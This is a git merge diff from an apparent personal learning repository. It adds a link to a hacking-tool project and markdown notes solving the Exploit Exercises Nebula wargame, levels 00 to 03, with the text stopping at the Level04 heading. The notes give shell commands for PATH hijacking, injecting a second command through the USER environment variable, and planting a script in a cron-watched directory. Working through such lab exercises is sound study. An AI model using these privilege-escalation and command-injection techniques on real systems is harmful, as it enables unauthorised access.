...

diff --cc .gitignore
index 2ebee3d7a6bf2d868c9164b9411ab47eb923eb76,13d5da22fe12c6af5a205019433e5a373f60841e..18789f414494e2b3a08be95bb3945606ab6c6180
--- 1/.gitignore
--- 2/.gitignore
+++ b/.gitignore
@@@ -1,4 -1,4 +1,5 @@@
  *.o
  *.out
  *.pyc
 +ish
+ *.DS_Store

diff --cc learn/doc/hacktools
index 0000000000000000000000000000000000000000,0000000000000000000000000000000000000000..234fec2088b88bb0914df88a7e0c14fc1af1602f
new file mode 100644 (file)
--- /dev/null
--- /dev/null
+++ b/learn/doc/hacktools
@@@ -1,0 -1,0 +1,1 @@@
++https://github.com/coca1ne/xosVer

diff --cc learn/markdown/exploit_exercises_nebula.md
index 0000000000000000000000000000000000000000,0000000000000000000000000000000000000000..98c65f323d19128578ba0f0abffcb50d61f144bf
new file mode 100644 (file)
--- /dev/null
--- /dev/null
+++ b/learn/markdown/exploit_exercises_nebula.md
@@@ -1,0 -1,0 +1,36 @@@
++#Exploit Exercises Nebula
++##Level00
++```
++$ cat /etc/passwd | grep flag00
++flag00:x:999:999::/home/flag00:/bin/sh
++$ find / -uid 999 2>/dev/null
++```
++
++##Level01
++
++```
++$ cd ~;mkdir bin;cd bin;echo '/bin/getflag > /tmp/level01.txt' > echo; chmod +x echo
++$export PATH=/home/level01/bin:$PATH
++$ /home/flag01/flag01
++$ cat /tmp/level01.txt
++```
++
++##Level02
++```
++$ export USER=";/bin/getflag > /tmp/level02.txt;/bin/echo"
++$ /home/flag02/flag02
++$ cat /tmp/level02.txt
++```
++
++##Level03
++```
++$ cd /home/flag03/
++$ echo '/bin/getflag > /tmp/level03.txt' > writable.d/hack; chmod +x writable.d/hack
++```
++等到hack被删除
++
++```
++$ cat /tmp/level03.txt
++```
++
++##Level04